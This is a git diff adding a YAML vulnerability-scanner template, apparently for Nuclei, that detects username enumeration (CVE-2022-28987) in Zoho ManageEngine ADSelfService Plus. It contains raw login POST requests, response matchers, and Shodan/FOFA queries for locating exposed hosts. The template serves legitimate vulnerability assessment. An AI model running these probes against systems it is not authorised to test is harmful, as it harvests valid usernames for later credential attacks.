diff --git a/http/cves/2022/CVE-2022-28987.yaml b/http/cves/2022/CVE-2022-28987.yaml new file mode 100644 index 00000000000..58ebe779430 --- /dev/null +++ b/http/cves/2022/CVE-2022-28987.yaml @@ -0,0 +1,54 @@ +id: CVE-2022-28987 + +info: + name: Zoho ManageEngine ADSelfService Plus 6121 - Username Enumeration + author: ritikchaddha + severity: medium + description: | + Zoho ManageEngine ADSelfService Plus 6121 is vulnerable to username enumeration (CVE-2022-28987). The Forgot Password functionality responds differently for existing and non-existing users, allowing attackers to enumerate valid usernames. + reference: + - https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-28987 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2022-28987 + cwe-id: CWE-203 + metadata: + max-request: 2 + verified: false + shodan-query: http.title:"ADSelfService Plus" + fofa-query: title="ADSelfService Plus" + tags: cve,cve2022,zoho,manageengine,user-enum,adselfservice + +http: + - raw: + - | + POST /ServletAPI/accounts/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + loginName=asdfnonexistent + + - | + POST /ServletAPI/accounts/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + loginName=Guest + + matchers-condition: or + matchers: + - type: dsl + dsl: + - 'contains(body, "eSTATUS\":\"Permission Denied")' + - 'contains(content_type, "application/json")' + - 'status_code == 200' + condition: and + + - type: dsl + dsl: + - 'contains(body, "eSTATUS\":\"Your account has been disabled")' + - 'contains(content_type, "application/json")' + - 'status_code == 200' + condition: and